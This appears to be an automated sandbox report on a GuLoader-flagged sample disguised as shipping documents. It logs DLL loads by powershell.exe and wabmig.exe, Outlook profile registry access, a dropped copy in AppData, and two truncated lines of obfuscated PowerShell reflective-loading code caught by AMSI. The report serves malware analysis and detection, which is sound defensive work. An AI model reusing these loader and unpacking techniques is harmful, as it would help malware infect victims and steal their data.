            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Shipping documents 000022999878999800009999.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdbE source: powershell.exe, 00000002.00000002.2775532254.0000000006CDD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbhx source: powershell.exe, 00000002.00000002.2779696439.0000000007FFE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2779696439.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000008.00000002.3376516352.0000000004687000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2780799795.00000000094D7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Freethinker $Fieldmouse $Maalscorers), (Waxen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bobles178 = [AppDomain]::CurrentDomain.GetAssemblies()$global
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Trachinus)), $Tenty132).DefineDynamicModule($Flugtskydningsbaner, $false).DefineType($Reconvoke, $Generalprverne, [System.MulticastDel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424A4ED pushad ; iretd 2_2_0424A53B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424E14C pushfd ; iretd 2_2_0424E155
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424CC1F pushfd ; iretd 2_2_0424CC61
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0424CA88 push C807E588h; ret 2_2_0424CA8D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_042415CC push ebx; iretd 2_2_042415DA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241D1C pushad ; retn 006Bh2_2_04241D92
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241DA7 pushad ; retn 006Bh2_2_04241DB2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241DB7 pushad ; retn 006Bh2_2_04241DB2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241DBC pushad ; retn 006Bh2_2_04241DC2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241AAC push ss; retf 2_2_04241AC3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241B64 push eax; retf 2_2_04241B73
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04241B5C push eax; retf 2_2_04241B63
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2525 push ebp; retf 2_2_06EF252E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2538 push esp; retf 2_2_06EF272A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF236C push ebx; retf 2_2_06EF237A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2160 push ebx; retf 2_2_06EF217A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EFE174 push 84E80818h; iretd 2_2_06EFE179
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF0EF9 push eax; retf 2_2_06EF0EFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2E20 push esp; retf 2_2_06EF305A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EFEDA8 push edx; ret 2_2_06EFEDAB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2AD1 push esp; retf 2_2_06EF2AD2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF0850 push ecx; retf 2_2_06EF09C2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF2929 push ebp; retf 2_2_06EF292A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF3169 push edi; retf 2_2_06EF316A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF1EC4 push esi; retf 2_2_06EF1ED2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06EF1E79 push edx; retf 2_2_06EF1E7A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 8_2_00830C6D push edi; retf 8_2_00830C7A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exeJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeFile created: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
